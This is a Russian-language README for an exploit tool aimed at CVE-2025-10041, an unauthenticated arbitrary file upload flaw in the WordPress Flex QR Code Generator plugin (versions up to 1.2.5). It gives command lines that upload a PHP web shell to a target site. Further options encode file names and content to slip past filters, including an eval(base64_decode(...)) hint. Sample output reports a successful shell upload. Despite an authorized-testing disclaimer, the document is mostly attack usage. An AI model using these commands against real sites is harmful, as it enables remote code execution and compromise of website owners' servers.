
Flex QR Code Generator <= 1.2.5 - Неаутентифицированная произвольная загрузка файлов
Flex QR Code Generator <= 1.2.5 - Неаутентифицированная произвольная загрузка файлов
Плагин Flex QR Code Generator для WordPress уязвим к произвольной загрузке файлов из-за отсутствия проверки типа файлов в функции save_qr_code_to_db() во всех версиях до 1.2.5 включительно.
Это позволяет неаутентифицированным злоумышленникам загружать вредоносные файлы на сервер атакуемого сайта, что потенциально может привести к удалённому выполнению кода.
CVE-2025-100419.8 (Critical)CVE-2025-10041.py — это профессиональный эксплойт-инструмент, предназначенный для автоматизации атаки с использованием данной уязвимости.
Он предоставляет расширенные возможности для обхода распространённых защит и методов кодирования.
python3 CVE-2025-10041.py -u http://target.com
python3 CVE-2025-10041.py -u http://target.com --encode_filename base64
python3 CVE-2025-10041.py -u http://target.com --encode_filename url
python3 CVE-2025-10041.py -u http://target.com --encode_content base64
python3 CVE-2025-10041.py -u http://target.com --shellname myevil.php
python3 CVE-2025-10041.py -u http://target.com --encode_content base64 --encode_filename base64 --shellname myevil.php
python3 CVE-2025-10041.py -u http://target.com --headers "X-Forwarded-For: 127.0.0.1" "Cookie: PHPSESSID=1337"
Чтобы просмотреть все доступные опции и инструкции по использованию:
python3 CVE-2025-10041.py --help
.php или подозрительные имена; кодирование может помочь обойти фильтры.eval(base64_decode(...)) может помочь обойти фильтры содержимого.Checking vulnerability version...
Target is vulnerable ...
Exploiting ...
Uploading shell 'shell.php' ...
Shell uploaded successfully.
Shell path (guess): /wp-content/uploads/shell_3.php
Response: {...}
Этот скрипт предоставлен исключительно для образовательных, исследовательских целей и авторизованного тестирования на проникновение.
Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, строго запрещено и противозаконно.
Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый данным инструментом.
Nxploited (Khaled Alenazi)